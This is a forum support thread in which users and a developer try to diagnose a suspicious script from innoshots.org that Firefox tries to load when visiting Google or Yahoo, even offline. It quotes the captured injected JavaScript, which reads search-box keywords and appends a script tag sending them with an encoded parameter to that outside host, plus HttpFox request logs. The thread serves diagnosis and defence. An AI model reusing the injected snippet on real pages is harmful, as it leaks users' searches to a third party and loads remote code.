RESOLVED Strange script tries to run when connection is down

[therube]

That works nonetheless.
You could have put it in a [ code ] tag.

Key Word Search perhaps. And ".live". We have that other thread where "live" was being injected into gmx.net. Coincidence perhaps.

Code: Select all

try{$("form .lsb").live("click",function(e){var kws=$("input.lst").val();$("#t0").remove();var script=document.createElement('script');script.id="t0";script.src="http://29.innoshots.org/ffeed.php?kws=" + kws + "&n=26606B673930206A616D37783C3F3F382026222A32607F73255D2E5E595B2F2E131964111D1114131E1168131919166D02000570720506730A1F59574A584C027771642220287B766E26393D293F737A7E60743F3027093265687C3830332A00055C53451353525A584F2F243E&r=5725";document.getElementsByTagName('body')[0].appendChild(script);});}catch(err){}	

[therube]

Oh. You've got IETAB. Does that like mean that IE is running embedded in FF .

[Montagar]

Oh. You've got IETAB. Does that like mean that IE is running embedded in FF .

Not if you don't turn it on, and it only uses the IE rendering engine for the specific FF tab that you turn in on for not across all tabs.

Also, Tom T. was able to recreate this situation and he did not have IE Tab installed.

[GµårÐïåñ]

Just to share something with you all that might be relevant. A few weeks back a legit site was found serving malware and they had no idea. It turns out they were showing an "AD" for someone who paid for it but was embedded with an encoded link serving up malware simply by being shown. This wasn't caught by the staff that loaded the ad on their site until people reported it. They took it down, apologized for not noticing but goes to show that there are tons of ways to make it happen. It could very well have been someone who is voluntarily serving the link up (may show up in google or yahoo results page, which would also serve it as well) by simply being archived even and it will take time to scrub it. One way to see if this is a possibility is to find out the commonalities of the search terms used by the people who experienced it and see if there is a common denominator that can help track down the source. Just saying but the hard part is that most search engines return so much and often unrelated sites in search results that no way to know.

[Tom T.]

@Giorgio: FWIW, I still can no longer reproduce the issue, with configuration identical to my previous post, all add-ons enabled.
The innoshot script does *not* try to load when I connect live to the sites in question.

A DNS hijack might be a culprit, no? But then, how can the script try to load with no connection?
OP appears to be US-based, as am I, but with a different ISP. Perhaps my ISP discovered this issue and resolved it, and Montagar's has not?

FWIW, I just searched the Registry for "innoshot", and found nothing. Perhaps OP should try this also?

@ Guardian: If I have all ads blocked, and <IFRAME> blocked, then could it still do this?
If it were a new ad domain not yet in my blocklist, then I would have seen the ad. Since I am accustomed to seeing none, I feel fairly certain that any such ad would have caught my eye. Anytime a new advertiser appears, I r-click the image and it is added to Adblock Original block list.

Edit: Guardian:

may show up in google or yahoo results page,

But OP and I *never saw a results page* -- with no connection, how could one show? It was *merely the attempt to connect to the site*, with no connection, that triggered the script attempting to load. No results or ads possible.

Also, yahoo.com is not a search engine alone, but their home page, which includes a search box, as many sites do. Again, no searches were performed by either OP or myself to reproduce the issue.

FWIW.

[Giorgio Maone]

A DNS hijack might be a culprit, no? But then, how can the script try to load with no connection?

Both NoScript and Adblock Plus intercept requests before they hit the network. Therefore you can see networked destination even though they won't be reached because you're offline.

OP appears to be US-based, as am I, but with a different ISP. Perhaps my ISP discovered this issue and resolved it, and Montagar's has not?

If it was an ISP problem your DNS wouldn't resolve (unless we're hitting a cached entry). Therefore we can probably rule out an ISP issue.

FWIW, I just searched the Registry for "innoshot", and found nothing. Perhaps OP should try this also?

I'd check also:

1. My hosts file
2. My proxy settings

[Montagar]

FWIW, I just searched the Registry for "innoshot", and found nothing. Perhaps OP should try this also?

I just searched the registry for "innoshot" and found nothing.

This has really got me scratching my head... something that resides on my computer that is undetected by anti-virus/anti-malware programs, and injects itself in an attempt to run a script from another site when FF tries to access www.google.com, www.yahoo.com or www.ask.com, even with no network cable attached to the computer.

[Tom T.]

If it was an ISP problem your DNS wouldn't resolve (unless we're hitting a cached entry). Therefore we can probably rule out an ISP issue.

Aha? IIRC, nearly all ISPs cache common domains (can't get much more common than Google or Yahoo), but with a fairly short expiration/refresh time, to handle IP changes. Perhaps my ISP had these cached with the infection, and so did OP's, but mine had a shorter expiration time, which is why I no longer see it?

FWIW, I just searched the Registry for "innoshot", and found nothing. Perhaps OP should try this also?

I'd check also:

1. My hosts file
2. My proxy settings

HOSTS file?

I'll check. (searches Hosts for "innoshot") Nope. There are various listings of Google variations, but they are *all* set to redirect to 0.0.0.0, which is a non-existent address.

I don't use a proxy. Home network > router > modem > ISP.

Edit @ Giorgio: Or did you mean locally cached on the machine?
I have Windows DNS Client disabled. Attempting "dns /?" from command prompt gives "not recognized command..."

And Fx Options > Advanced > Network > Connection > Settings is checked "Direct connection to the Internet".

[GµårÐïåñ]

The ad image itself was just a facade and is often blocked, it was the embedded script that due to the trusted parent website was allowed to run on many machines which created a locally accessible redundant file that allowed it from that point forth to run independently and without need for the browser really, although it hooks IE once on the machine and runs as part of explorer.exe which is allowed by all av/firewall solutions pretty much by default. This was noticed actually due to a poorly implemented design model by the developer of the malware who did not include a "online" check (meaning do we have internet access?) before running, causing it to show up when people were not connected and issuing errors, which made it known. From a purely programming perspective, a shame that such a successful attempt failed due to careless error trapping and checks; otherwise, it could have effectively run indefinitely without being detected. Oh well.

[Tom T.]

it was the embedded script that due to the trusted parent website was allowed to run

Interesting. But the script in question was not under the Yahoo domain, it was under innoshot.com. Neither OP nor I ever allowed innoshot, so how can it load and infect the machine?

And why would it spontaneously disappear from mine?

As for the attack you mentioned, yes, it's good that bad people are often but not always) stupid or careless people.

[GµårÐïåñ]

No my friend, that's not what I meant. I am sorry. Let me try to clarify.

1. Legit site (yahoo, google, informaction, etc, etc) accepts to post ad code for client X
2. Client X embeds a script inside its ad and when you allow legit site (the parent in this case) it will allow it to run the code
3. The code is to something illegit or possibly fishy (badsite, bot, clicker, p0rn, or in this case possibly innoshot)

did I make clear what I meant by allowing the parent? The ultimate payload is not the parent, its the surrogate that got allowed by the parent by inheriting its permissions. Also keep in mind, this is based on technical experience speculation and it could end up being as wrong as Bill Gates' statement regarding memory a decade ago. You never know with technology.

So far I was happy to see that some of the thing Giorgio suggested were in line with what I presented as possibilities, so in that there is some degree of satisfaction, even if our ultimate speculation is wrong and turns out to be something benign that was overlooked. All else fails, the discussion here alone will be eye opening to some, reinforce others and hopefully help some with better understanding of the massive amount of possibilities that are available to a good programmer. Luckily, most of us are not malicious.

[Tom T.]

(The continuing discussion with Guardian was split and moved to forum NoScript Development, as it was more about preventing such things in the future via enhancements to NS capability and usability. Getting off-topic to OP, which has yet to be resolved.)

[Montagar]

I would rather not have to wipe out FF completely and install FF from scratch, but I am running out of ideas. Does anyone have any suggestions as to what else I can try to attempt to find out where this script is coming from?

I clearly a fact that it is something on the computer itself, but I am still trying to determine if it's "in" FF or not.

I know this has gone somewhat beyond a NoScript support issue, but I think that working this issue out might help other users as well.

Thanks

Edit by Tom T: I'll ask Giorgio to get back on it. I'm doing this as an edit rather than a reply, so that your name is visible on the boards as last poster rather than mine, as more attention-getting (OP still having issue).

[Giorgio Maone]

Please install the HttpFox, record your session and copy all the rows here.

[Montagar]

Please install the HttpFox, record your session and copy all the rows here.

Not familiar with this add-on, but I think the following is is what you asked for, but since NoScript is blocking the innoshots script, none of that info shows up.

00:00:29.739 0.058 612 0 GET null Redirect (cached) http://www.google.com/
00:00:29.810 0.154 612 3234 GET 200 text/html http://www.google.com/
00:00:29.970 0.112 642 8817 GET 200 image/gif http://www.google.com/intl/en_ALL/images/logo.gif
00:00:30.067 0.124 724 10926 GET 200 text/javascript http://www.google.com/extern_js/f/CgJlbhICdXMrMAo4QkAILCswDjgJLCswFjgQLCswFzgELCswGDgELCswGTgJLCswJTjJiAEsKzAmOAUsKzAnOAIsKzAqOAIsKzArOAcsKzA8OAAs/thnq-wiJ9NI.js
00:00:30.193 0.015 632 0 GET null Redirect (cached) http://clients1.google.com/generate_204
00:00:30.244 0.066 632 144 GET 204 text/html http://clients1.google.com/generate_204
00:00:30.323 0.065 635 5660 GET 200 image/png http://www.google.com/images/nav_logo7.png
00:00:30.336 0.122 752 209 GET 204 text/html http://www.google.com/csi?v=3&s=webhp&action=&tran=undefined&e=17259,21590,21766,21930,22107,22217,22243,22525&ei=xhvuSpbYGp-2NM_ckbAN&rt=prt.20,xjs.244,ol.371
00:00:30.360 0.065 593 1464 GET 200 image/x-icon http://www.google.com/favicon.ico